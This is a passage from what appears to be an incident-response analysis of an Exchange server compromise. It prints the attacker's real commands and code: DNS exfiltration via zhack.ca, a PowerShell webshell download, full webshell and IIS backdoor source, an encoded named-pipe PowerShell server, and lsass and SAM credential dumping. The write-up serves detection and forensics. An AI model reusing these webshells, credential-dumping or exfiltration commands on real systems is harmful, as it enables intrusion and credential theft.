The attacker performed two more exploit success checks by launching an ftp command to anonymously login to IP address 185.25.51.71, followed by a ping request to a Burp Collaborator domain:

 

Exploit-success checks

 

The attacker returned on 29 February 2020 to attempt to establish persistence on the Exchange servers (multiple servers were load balanced). The exploit commands once again started with pings to Burp Collaborator domains and FTP connection attempts to IP address 185.25.51.71 to ensure that the server was still exploitable. These were followed up by commands to write simple strings into files in the Exchange directories, as shown below:

 

Exploit success checks

 

The attacker also attempted to create a local user account named “public” with password “Asp-=14789’’ via the exploit, and attempted to add this account to the local administrators group. These two actions failed.

 

Attacker commands
cmd /c net user public Asp-=14789 /add
cmd /c net localgroup administrators public /add

   

The attacker issued several ping requests to subdomains under zhack.ca, which is a site that can be freely used to test data exfiltration over DNS. In these commands, the DNS resolution itself is what enables the sending of data to the attacker. Again, the attacker appears to have been trying to see if the exploit commands were successful, and these DNS requests would have confirmed the success of the exploit commands.

 

Here is what the attacker would have seen if the requests were successful:

 

DNSBin RSA test

 

Here are some of the generic domain names the attacker tried:

 

zhack.ca pings
ping –n 1 asd.ddb8d339493dc0834c6f.d.zhack.ca
ping –n 1 mydatahere.9234b19e99d260b486b5.d.zhack.ca
ping –n 1 asasdd.ddb8d339493dc0834c6f.d.zhack.ca

 

After confirming that the DNS requests were being made, the attacker then started concatenating the output of Powershell commands to these DNS requests in order to see the result of the commands. It is worth mentioning here that at this point the attacker was still executing commands via the exploit, and while the commands did execute, the attacker did not have a way to see the results of such attempts. Hence, initially the attacker wrote some output to files as shown above (such as flogon2.txt), or in this case sending the output of the commands via DNS lookups. So, for example, the attacker tried commands such as:

 

Concatenating Powershell command results to DNS queries

 

powershell Resolve-DnsName((test-netconnection google.com -port 443 -informationlevel quiet).toString()+'.1.0d7a5e6cf01310fe3fd5.d.zhack.ca')

powershell Resolve-DnsName((test-path 'c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth').toString()+$env:computername+'.2.0d7a5e6cf01310fe3fd5.d.zhack.ca')

 

These types of request would have confirmed that the server is allowed to connect outbound to the Internet (by being able to reach google.com), test the existence of the specified path, and sent the hostname to the attacker. 

 

Exploit command output exfiled via DNS

 

Entrenchment

 

Once the attacker confirmed that the server(s) could reach the Internet and verified the Exchange path, he/she issued a command via the exploit to download a webshell hosted at pastebin into this directory under a file named OutlookDN.aspx (I am redacting the full pastebin link to prevent the hijacking of such webshells on other potential victims by other actors, since the webshell is password protected):

 

Webshell Upload via Exploit
powershell (New-Object System.Net.WebClient).DownloadFile('http://pastebin.com/raw/**REDACTED**','C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookDN.aspx')

 

The webshell code downloaded from pastebin is shown below:

 

Content of OutlookDN.aspx webshell
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="whoami" />
<asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
</form>
<script runat="server">
protected void exec(object sender, EventArgs e)
{
Process p = new Process();
p.StartInfo.FileName = "cmd";
p.StartInfo.Arguments = "/c " + cmd.Text;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.Start();
Response.Write("<pre>\r\n"+p.StandardOutput.ReadToEnd() +"\r\n</pre>");
p.Close();
}
protected void Page_Load(object sender, EventArgs e)
{
if (Request.Params["pw"]!="*******REDACTED********") Response.End();
}
</script>

 

At this point the exploit was no longer necessary since this webshell was now directly accessible and the results of the commands were displayed back to the attacker. The attacker proceeded to execute commands via this webshell and upload other webshells from this point forward. One of the other uploaded webshells is shown below:

 

Webshell 2
powershell [System.IO.File]::WriteAllText('c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\a.aspx',[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiU+PCVTeXN0ZW0uSU8uRmlsZS5Xcml0ZUFsbEJ5dGVzKFJlcXVlc3RbInAiXSxDb252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoUmVxdWVzdC5Db29raWVzWyJjIl0uVmFsdWUpKTslPgo=')))

The webshell code decoded from above is:

 

<%@ Page Language="C#"%><%System.IO.File.WriteAllBytes(Request["p"],Convert.FromBase64String(Request.Cookies["c"].Value));%>

 

At this point the attacker performed some of the most common activities that attackers perform during the early stages of the compromise. Namely, credential harvesting,  user and group lookups, some pings and directory traversals.

 

The credential harvesting consisted of several common techniques:

 

Credential harvesting related activity

Used SysInternal’s ProcDump (pr.exe) to dump the lsass.exe process memory:

cmd.exe /c pr.exe -accepteula -ma lsass.exe lsasp

Used the comsvcs.dll technique to dump the lsass.exe process memory:

cmd /c tasklist | findstr lsass.exe
cmd.exe /c rundll32.exe c:\windows\system32\comsvcs.dll, Minidump 944 c:\windows\temp\temp.dmp full

Obtained copies of the SAM and SYSTEM hives for the purpose of harvesting local account password hashes. 

These files were then placed on public facing exchange folders and downloaded directly from the Internet:

cmd /c copy c:\windows\system32\inetsrv\system
"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\system.js"

cmd /c copy c:\windows\system32\inetsrv\sam
"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\sam.js"

 

In addition to the traditional ASPX type webshells, the attacker introduced another type of webshell into the Exchange servers. Two files were uploaded under the c:\windows\temp\ folder to setup this new backdoor:

 

C:\windows\temp\System.Web.TransportClient.dll
C:\windows\temp\tmp.ps1

 

File System.Web.TransportClient.dll is webshell, whereas file tmp.ps1 is a script to register this DLL with IIS. The content of this script are shown below:

 

[System.Reflection.Assembly]::Load("System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a")            
$publish = New-Object System.EnterpriseServices.Internal.Publish
$name = (gi C:\Windows\Temp\System.Web.TransportClient.dll).FullName
$publish.GacInstall($name)
$type = "System.Web.TransportClient.TransportHandlerModule, " + [System.Reflection.AssemblyName]::GetAssemblyName($name).FullName
c:\windows\system32\inetsrv\Appcmd.exe add module /name:TransportModule /type:"$type"

 

The decompiled code of the DLL is shown below (I am only showing part of the AES encryption key, to once again prevent the hijacking of such a webshell):

 

using System.Diagnostics;
using System.IO;
using System.IO.Pipes;
using System.Security.Cryptography;
using System.Text;
namespace System.Web.TransportClient
{
public class TransportHandlerModule : IHttpModule
{
public void Init(HttpApplication application)
{
application.BeginRequest += new EventHandler(this.Application_EndRequest);
}
private void Application_EndRequest(object source, EventArgs e)
{
HttpContext context = ((HttpApplication) source).Context;
HttpRequest request = context.Request;
HttpResponse response = context.Response;
string keyString = "kByTsFZq********nTzuZDVs********";
string cipherData1 = request.Params[keyString.Substring(0, 8)];
string cipherData2 = request.Params[keyString.Substring(16, 8)];
if (cipherData1 != null)
{
response.ContentType = "text/plain";
string plain;
try
{
string command = TransportHandlerModule.Decrypt(cipherData1, keyString);
plain = cipherData2 != null ? TransportHandlerModule.Client(command, TransportHandlerModule.Decrypt(cipherData2, keyString)) : TransportHandlerModule.run(command);
}
catch (Exception ex)
{
plain = "error:" + ex.Message + " " + ex.StackTrace;
}
response.Write(TransportHandlerModule.Encrypt(plain, keyString));
response.End();
}
else
context.Response.DisableKernelCache();
}
private static string Encrypt(string plain, string keyString)
{
byte[] bytes1 = Encoding.UTF8.GetBytes(keyString);
byte[] salt = new byte[10]
{
(byte) 1,
(byte) 2,
(byte) 23,
(byte) 234,
(byte) 37,
(byte) 48,
(byte) 134,
(byte) 63,
(byte) 248,
(byte) 4
};
byte[] bytes2 = new Rfc2898DeriveBytes(keyString, salt).GetBytes(16);
RijndaelManaged rijndaelManaged1 = new RijndaelManaged();
rijndaelManaged1.Key = bytes1;
rijndaelManaged1.IV = bytes2;
rijndaelManaged1.Mode = CipherMode.CBC;
using (RijndaelManaged rijndaelManaged2 = rijndaelManaged1)
{
using (MemoryStream memoryStream = new MemoryStream())
{
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged2.CreateEncryptor(bytes1, bytes2), CryptoStreamMode.Write))
{
byte[] bytes3 = Encoding.UTF8.GetBytes(plain);
memoryStream.Write(bytes2, 0, bytes2.Length);
cryptoStream.Write(bytes3, 0, bytes3.Length);
cryptoStream.Close();
return Convert.ToBase64String(memoryStream.ToArray());
}
}
}
}
private static string Decrypt(string cipherData, string keyString)
{
byte[] bytes = Encoding.UTF8.GetBytes(keyString);
byte[] buffer = Convert.FromBase64String(cipherData);
byte[] rgbIV = new byte[16];
Array.Copy((Array) buffer, 0, (Array) rgbIV, 0, 16);
RijndaelManaged rijndaelManaged1 = new RijndaelManaged();
rijndaelManaged1.Key = bytes;
rijndaelManaged1.IV = rgbIV;
rijndaelManaged1.Mode = CipherMode.CBC;
using (RijndaelManaged rijndaelManaged2 = rijndaelManaged1)
{
using (MemoryStream memoryStream = new MemoryStream(buffer, 16, buffer.Length - 16))
{
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged2.CreateDecryptor(bytes, rgbIV), CryptoStreamMode.Read))
return new StreamReader((Stream) cryptoStream).ReadToEnd();
}
}
}
private static string run(string command)
{
string str = "/c " + command;
Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = str;
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
return process.StandardOutput.ReadToEnd();
}
private static string Client(string command, string path)
{
string pipeName = "splsvc";
string serverName = ".";
Console.WriteLine("sending to : " + serverName + ", path = " + path);
using (NamedPipeClientStream pipeClientStream = new NamedPipeClientStream(serverName, pipeName))
{
pipeClientStream.Connect(1500);
StreamWriter streamWriter = new StreamWriter((Stream) pipeClientStream);
streamWriter.WriteLine(path);
streamWriter.WriteLine(command);
streamWriter.WriteLine("**end**");
streamWriter.Flush();
return new StreamReader((Stream) pipeClientStream).ReadToEnd();
}
}
public void Dispose()
{
}
}
}

 

The registered DLL shows up in the IIS Modules as TransportModule:

 

IIS Module Installation

 

This DLL webshell is capable of executing commands directly via cmd.exe, or send the command to a pipe named splsvc. In this setup, the DLL acts as the pipe client, i.e. it sends data to the named pipe. In order to setup the other side of the pipe (i.e. the server side of the pipe), the attacker executed this command:

 

cmd.exe /c WMIC /node:"." process call create "powershell -enc
JABzAGMAcgBpAHAAdAAgAD0AIAB7AAoACQAkAHAAaQBwAGUATgBhAG0AZQAgAD0AIAAnAHMAcABsAHMAdgBjACcACgAJACQAYwBtAGQAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAHQAZQByACAAIgBoAGEAbgBkAGwAZQAgAD0AIAAkAHAAaQBkACIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAYwBvAG0AbQBhAG4AZABsAGkAbgBlAAoACQAkAGwAaQBzAHQAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAC0AZQBxACAAJABjAG0AZAAgAC0AYQBuAGQAIAAkAF8ALgBIAGEAbgBkAGwAZQAgAC0AbgBlACAAJABwAGkAZAB9ACAACgAJAGkAZgAgACgAJABsAGkAcwB0AC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAApACAAewAKAAkACQAkAGwAaQBzAHQAIAB8ACAAZgBvAHIAZQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAALQBwAHIAbwBjAGUAcwBzACAAewBzAHQAbwBwAC0AcAByAG8AYwBlAHMAcwAgAC0AaQBkACAAJABfAC4ASABhAG4AZABsAGUAfQAKAAkAfQAKAAkAZgB1AG4AYwB0AGkAbwBuACAAaABhAG4AZABsAGUAQwBvAG0AbQBhAG4AZAAoACkAIAB7AAoACQAJAHcAaABpAGwAZQAgACgAJAB0AHIAdQBlACkAIAB7AAoACQAJAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAYwByAGUAYQB0AGUAIABwAGkAcABlACAAcwBlAHIAdgBlAHIAIgAKAAkACQAJACQAcwBpAGQAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBTAGUAYwB1AHIAaQB0AHkASQBkAGUAbgB0AGkAZgBpAGUAcgAoAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAZQBsAGwASwBuAG8AdwBuAFMAaQBkAFQAeQBwAGUAXQA6ADoAVwBvAHIAbABkAFMAaQBkACwAIAAkAE4AdQBsAGwAKQAKAAkACQAJACQAUABpAHAAZQBTAGUAYwB1AHIAaQB0AHkAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABpAHAAZQBzAC4AUABpAHAAZQBTAGUAYwB1AHIAaQB0AHkACgAJAAkACQAkAEEAYwBjAGUAcwBzAFIAdQBsAGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABpAHAAZQBzAC4AUABpAHAAZQBBAGMAYwBlAHMAcwBSAHUAbABlACgAIgBFAHYAZQByAHkAbwBuAGUAIgAsACAAIgBGAHUAbABsAEMAbwBuAHQAcgBvAGwAIgAsACAAIgBBAGwAbABvAHcAIgApAAoACQAJAAkAJABQAGkAcABlAFMAZQBjAHUAcgBpAHQAeQAuAFMAZQB0AEEAYwBjAGUAcwBzAFIAdQBsAGUAKAAkAEEAYwBjAGUAcwBzAFIAdQBsAGUAKQAKAAkACQAJACQAcABpAHAAZQAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGkAcABlAHMALgBOAGEAbQBlAGQAUABpAHAAZQBTAGUAcgB2AGUAcgBTAHQAcgBlAGEAbQAgACQAcABpAHAAZQBOAGEAbQBlACwAIAAnAEkAbgBPAHUAdAAnACwAIAA2ADAALAAgACcAQgB5AHQAZQAnACwAIAAnAE4AbwBuAGUAJwAsACAAMwAyADcANgA4ACwAIAAzADIANwA2ADgALAAgACQAUABpAHAAZQBTAGUAYwB1AHIAaQB0AHkACgAJAAkACQAjACQAcABpAHAAZQAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGkAcABlAHMALgBOAGEAbQBlAGQAUABpAHAAZQBTAGUAcgB2AGUAcgBTAHQAcgBlAGEAbQAgACQAcABpAHAAZQBOAGEAbQBlACwAIAAnAEkAbgBPAHUAdAAnACwAIAA2ADAACgAJAAkACQAkAHAAaQBwAGUALgBXAGEAaQB0AEYAbwByAEMAbwBuAG4AZQBjAHQAaQBvAG4AKAApAAoACQAJAAkAJAByAGUAYQBkAGUAcgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAcABpAHAAZQApADsACgAJAAkACQAkAHcAcgBpAHQAZQByACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFcAcgBpAHQAZQByACgAJABwAGkAcABlACkAOwAKAAoACQAJAAkAJABwAGEAdABoACAAPQAgACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAEwAaQBuAGUAKAApADsACgAJAAkACQAkAGQAYQB0AGEAIAA9ACAAJwAnACAACgAJAAkACQB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApACAAewAKAAkACQAJAAkAJABsAGkAbgBlACAAPQAgACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAEwAaQBuAGUAKAApAAoACQAJAAkACQBpAGYAIAAoACQAbABpAG4AZQAgAC0AZQBxACAAJwAqACoAZQBuAGQAKgAqACcAKQAgAHsACgAJAAkACQAJAAkAYgByAGUAYQBrAAoACQAJAAkACQB9AAoACQAJAAkACQAkAGQAYQB0AGEAIAArAD0AIAAkAGwAaQBuAGUAIAArACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQAKAAkACQAJAH0ACgAJAAkACQB3AHIAaQB0AGUALQBoAG8AcwB0ACAAJABwAGEAdABoAAoACQAJAAkAdwByAGkAdABlAC0AaABvAHMAdAAgACQAZABhAHQAYQAKAAkACQAJAHQAcgB5ACAAewAKAAkACQAJAAkAJABwAGEAcgB0AHMAIAA9ACAAJABwAGEAdABoAC4AUwBwAGwAaQB0ACgAJwA6ACcAKQAKAAkACQAJAAkAJABpAG4AZABlAHgAIAA9ACAAWwBpAG4AdABdADoAOgBQAGEAcgBzAGUAKAAkAHAAYQByAHQAcwBbADAAXQApAAoACQAJAAkACQBpAGYAIAAoACQAaQBuAGQAZQB4ACAAKwAgADEAIAAtAGUAcQAgACQAcABhAHIAdABzAC4ATABlAG4AZwB0AGgAKQAgAHsACgAJAAkACQAJAAkAJAByAGUAdAB2AGEAbAAgAD0AIABpAGUAeAAgACQAZABhAHQAYQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnAAoACQAJAAkACQB9ACAAZQBsAHMAZQAgAHsACgAJAAkACQAJAAkAJABwAGEAcgB0AHMAWwAwAF0AIAA9ACAAKAAkAGkAbgBkAGUAeAAgACsAIAAxACkALgBUAG8AUwB0AHIAaQBuAGcAKAApAAoACQAJAAkACQAJACQAbgBlAHcAUABhAHQAaAAgAD0AIAAkAHAAYQByAHQAcwAgAC0AagBvAGkAbgAgACcAOgAnAAoACQAJAAkACQAJACQAcgBlAHQAdgBhAGwAIAA9ACAAcwBlAG4AZAAgACQAcABhAHIAdABzAFsAJABpAG4AZABlAHgAIAArACAAMQBdACAAJABuAGUAdwBQAGEAdABoACAAJABkAGEAdABhAAoACQAJAAkACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAHMAZQBuAGQAIAB0AG8AIABuAGUAeAB0ACcAIAArACAAJAByAGUAdAB2AGEAbAAKAAkACQAJAAkAfQAKAAkACQAJAH0AIABjAGEAdABjAGgAIAB7AAoACQAJAAkACQAkAHIAZQB0AHYAYQBsACAAPQAgACcAZQByAHIAbwByADoAJwAgACsAIAAkAGUAbgB2ADoAYwBvAG0AcAB1AHQAZQByAG4AYQBtAGUAIAArACAAJwA+ACcAIAArACAAJABwAGEAdABoACAAKwAgACcAPgAgACcAIAArACAAJABFAHIAcgBvAHIAWwAwAF0ALgBUAG8AUwB0AHIAaQBuAGcAKAApAAoACQAJAAkAfQAKAAkACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAHIAZQB0AHYAYQBsAAoACQAJAAkAJAB3AHIAaQB0AGUAcgAuAFcAcgBpAHQAZQBMAGkAbgBlACgAJAByAGUAdAB2AGEAbAApAAoACQAJAAkAJAB3AHIAaQB0AGUAcgAuAEYAbAB1AHMAaAAoACkACgAJAAkACQAkAHcAcgBpAHQAZQByAC4AQwBsAG8AcwBlACgAKQAKAAkACQB9AAoACQB9AAoACQBmAHUAbgBjAHQAaQBvAG4AIABzAGUAbgBkACgAJABuAGUAeAB0ACwAIAAkAHAAYQB0AGgALAAgACQAZABhAHQAYQApACAAewAKAAkACQB3AHIAaQB0AGUALQBoAG8AcwB0ACAAJwBuAGUAeAB0ACcAIAArACAAJABuAGUAeAB0AAoACQAJAHcAcgBpAHQAZQAtAGgAbwBzAHQAIAAkAHAAYQB0AGgACgAJAAkAJABjAGwAaQBlAG4AdAAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGkAcABlAHMALgBOAGEAbQBlAGQAUABpAHAAZQBDAGwAaQBlAG4AdABTAHQAcgBlAGEAbQAgACQAbgBlAHgAdAAsACAAJABwAGkAcABlAE4AYQBtAGUALAAgACcASQBuAE8AdQB0ACcALAAgACcATgBvAG4AZQAnACwAIAAnAEEAbgBvAG4AeQBtAG8AdQBzACcACgAJAAkAJABjAGwAaQBlAG4AdAAuAEMAbwBuAG4AZQBjAHQAKAAxADAAMAAwACkACgAJAAkAJAB3AHIAaQB0AGUAcgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAYwBsAGkAZQBuAHQAKQAKAAkACQAkAHcAcgBpAHQAZQByAC4AVwByAGkAdABlAEwAaQBuAGUAKAAkAHAAYQB0AGgAKQAKAAkACQAkAHcAcgBpAHQAZQByAC4AVwByAGkAdABlAEwAaQBuAGUAKAAkAGQAYQB0AGEAKQAKAAkACQAkAHcAcgBpAHQAZQByAC4AVwByAGkAdABlAEwAaQBuAGUAKAAnACoAKgBlAG4AZAAqACoAJwApAAoACQAJACQAdwByAGkAdABlAHIALgBGAGwAdQBzAGgAKAApAAoACQAJACQAcgBlAGEAZABlAHIAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAGMAbABpAGUAbgB0ACkAOwAKAAkACQAkAHIAZQBzAHAAIAA9ACAAJAByAGUAYQBkAGUAcgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQAKAAkACQAkAHIAZQBzAHAACgAJAH0ACgAJACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAHQAbwBwACcACgAJAGgAYQBuAGQAbABlAEMAbwBtAG0AYQBuAGQACgB9AAoASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAkAHMAYwByAGkAcAB0AAoA

 

The encoded data in the Powershell command decodes to this script, which sets up the pipe server:

 

$script = {
     $pipeName = 'splsvc'
     $cmd = Get-WmiObject Win32_Process -Filter "handle = $pid" | Select-Object -ExpandProperty commandline
     $list = Get-WmiObject Win32_Process | Where-Object {$_.CommandLine -eq $cmd -and $_.Handle -ne $pid}
     if ($list.length -ge 50) {
          $list | foreach-Object -process {stop-process -id $_.Handle}
     }
     function handleCommand() {
          while ($true) {
               Write-Host "create pipe server"
               $sid = new-object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::WorldSid, $Null)
               $PipeSecurity = new-object System.IO.Pipes.PipeSecurity
               $AccessRule = New-Object System.IO.Pipes.PipeAccessRule("Everyone", "FullControl", "Allow")
               $PipeSecurity.SetAccessRule($AccessRule)
               $pipe = new-object System.IO.Pipes.NamedPipeServerStream $pipeName, 'InOut', 60, 'Byte', 'None', 32768, 32768, $PipeSecurity
               #$pipe = new-object System.IO.Pipes.NamedPipeServerStream $pipeName, 'InOut', 60
               $pipe.WaitForConnection()
               $reader = new-object System.IO.StreamReader($pipe);
               $writer = new-object System.IO.StreamWriter($pipe);

               $path = $reader.ReadLine();
               $data = ''
               while ($true) {
                    $line = $reader.ReadLine()
                    if ($line -eq '**end**') {
                         break
                    }
                    $data += $line + [Environment]::NewLine
               }
               write-host $path
               write-host $data
               try {
                    $parts = $path.Split(':')
                    $index = [int]::Parse($parts[0])
                    if ($index + 1 -eq $parts.Length) {
                         $retval = iex $data | Out-String
                    } else {
                         $parts[0] = ($index + 1).ToString()
                         $newPath = $parts -join ':'
                         $retval = send $parts[$index + 1] $newPath $data
                         Write-Host 'send to next' + $retval
                    }
               } catch {
                    $retval = 'error:' + $env:computername + '>' + $path + '> ' + $Error[0].ToString()
               }
               Write-Host $retval
               $writer.WriteLine($retval)
               $writer.Flush()
               $writer.Close()
          }
     }
     function send($next, $path, $data) {
          write-host 'next' + $next
          write-host $path
          $client = new-object System.IO.Pipes.NamedPipeClientStream $next, $pipeName, 'InOut', 'None', 'Anonymous'
          $client.Connect(1000)
          $writer = new-object System.IO.StreamWriter($client)
          $writer.WriteLine($path)
          $writer.WriteLine($data)
          $writer.WriteLine('**end**')
          $writer.Flush()
          $reader = new-object System.IO.StreamReader($client);
          $resp = $reader.ReadToEnd()
          $resp
     }
     $ErrorActionPreference = 'Stop'
     handleCommand
}
Invoke-Command -ScriptBlock $script

 

From an EDR perspective, the interesting aspect of this type of webshell is that other than the command to setup the pipe server, which is executed via the w3wp.exe process, the rest of the commands are executed via the Powershell command that sets up the pipe server, even though the commands are coming through w3wp.exe process. In fact, once the attacker setup this type of webshell in this intrusion, he/she deleted all of the initial ASPX based webshells.

 

Webshell interaction

 

Although during this incident the pipe webshell was only used on the exchange server itself, it is possible to 

 

Webshell Data Decryption

 

In order to communicate with this webshell, the attacker issued the commands via the /ews/exchange.asmx page. Lets break down the communication with this webshell and highlight some of the characteristics that make it unique. Here is a sample command:

 

Request
POST /ews/exchange.asmx HTTP/1.1
host: webmail.***************.com
content-type: application/x-www-form-urlencoded
content-length: 385
Connection: close
kByTsFZq=t52oDnptrTkTGLPlNYi6U2crOvyn5KhAC2MJegqJ2s5396NZ9ZFqEuN2RHAaaqePvgKuQ7X
%2BPFePh0x3QNXbL9sMnyPkRcA3IvyGbPFbt89cwlmtuPLJdjmCZ%2FDNPacCBeG2PzLV70p2Q0vRiyO
Xzi2NeEo6jcyc5iQAfOFCWPf90OjoEDruADkMgg18JV7hqtBWLsOF1caRW8%2BVcEj0Fii88I9zGYwjd
%2F9Dv3TV4SFKxVvYeVJRr6lTHHO0RIJEGVU5Oa8F%2BkO%2BEQt%2FtS49h8J%2FpjTNShwZOALoLUu
B7Rc%3D&nTzuZDVs=SryqIaK3fpejyDoOdyf9b%2Fi7aBqPAzBL1SUROVuScbc%3D

 

Response
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-FEServer: ***************
Date: Sat, 07 Mar 2020 08:10:43 GMT
Content-Length: 1606656

2QfeQaDxyIZD4JjRv7tj0XmEwYRrdN5wFMCj5ROF2vV/7y7WUPkH2S7ZASsoQpNgX7F+aMek0q72blHF
kdKDQFwDVjPr9sBWR2grwHPsXENO2KFKle5i63TAOUzlHgs3LTwuGc/Md41r60l+5ke+xLhIKKXCHZTx
nG9BRHgtefPlFR8BEzlJcWA5SOgo+n29DZjqjhBeenMqL+d+DNECKjXdji8IIr/AsvWoEkiwuv05K04E
cJpjecIUzVKSkcgGmhCoijl5QEN8N32E//NkpfEgq/Rqsytf8xIwSDqUlTqObUwwq0BkOX79mI6WS5Zu
627Rf6z7SNyH+zHe0dEAcBAZDH2sEfyFUe2QQjK8J7M/QBU5vDGj***** REDACTED ******

 

The request to /ews/exchange.asmx is done in lowercase. While there are a couple of email clients that exhibit that same behavior, they could be quickly filtered out, especially when we see that the requests to this webshell do not even contain a user agent. We also notice that several of the other HTTP headers are in lowercase. Namely,

host: vs Host:

content-type: vs Content-Type:

content-length: vs Content-Length:

 

The actual command follows the HTTP headers. Lets break down this command:

 

kByTsFZq=t52oDnptrTkTGLPlNYi6U2crOvyn5KhAC2MJegqJ2s5396NZ9ZFqEuN2RHAaaqePvgKuQ7X%2BPFePh0x3QNXbL9sMnyPkRcA3IvyGbPFbt89cwlmtuPLJdjmCZ%2FDNPacCBeG2PzLV70p2Q0vRiyOXzi2NeEo6jcyc5iQAfOFCWPf90OjoEDruADkMgg18JV7hqtBWLsOF1caRW8%2BVcEj0Fii88I9zGYwjd%2F9Dv3TV4SFKxVvYeVJRr6lTHHO0RIJEGVU5Oa8F%2BkO%2BEQt%2FtS49h8J%2FpjTNShwZOALoLUuB7Rc%3D&nTzuZDVs=SryqIaK3fpejyDoOdyf9b%2Fi7aBqPAzBL1SUROVuScbc%3D

 

The beginning of the payload contains part of the AES encryption key. Namely, in the decompiled code shown above we notice that the AES key is: kByTsFZq********nTzuZDVs********

 

The data that follows the first 8 bytes of the key is shown below:

 

t52oDnptrTkTGLPlNYi6U2crOvyn5KhAC2MJegqJ2s5396NZ9ZFqEuN2RHAaaqePvgKuQ7X%2BPFePh0x3QNXbL9sMnyPkRcA3IvyGbPFbt89cwlmtuPLJdjmCZ%2FDNPacCBeG2PzLV70p2Q0vRiyOXzi2NeEo6jcyc5iQAfOFCWPf90OjoEDruADkMgg18JV7hqtBWLsOF1caRW8%2BVcEj0Fii88I9zGYwjd%2F9Dv3TV4SFKxVvYeVJRr6lTHHO0RIJEGVU5Oa8F%2BkO%2BEQt%2FtS49h8J%2FpjTNShwZOALoLUuB7Rc%3D

 

Lets decrypt this data step by step, and build a Cyberchef recipe to do the job for us:

 

Step 1 - 3: The obfuscated data needs to be URL decoded, however, the + character is a legitimate Base64 character that is misinterpreted by the URL decoder as a space. So, we first replace the + with a . (dot). The + character will not necessarily be in every chunk of Base64 encoded data, but we need to account for it in order to build an error free recipe.

 

Decrypting: Step 1-3

 

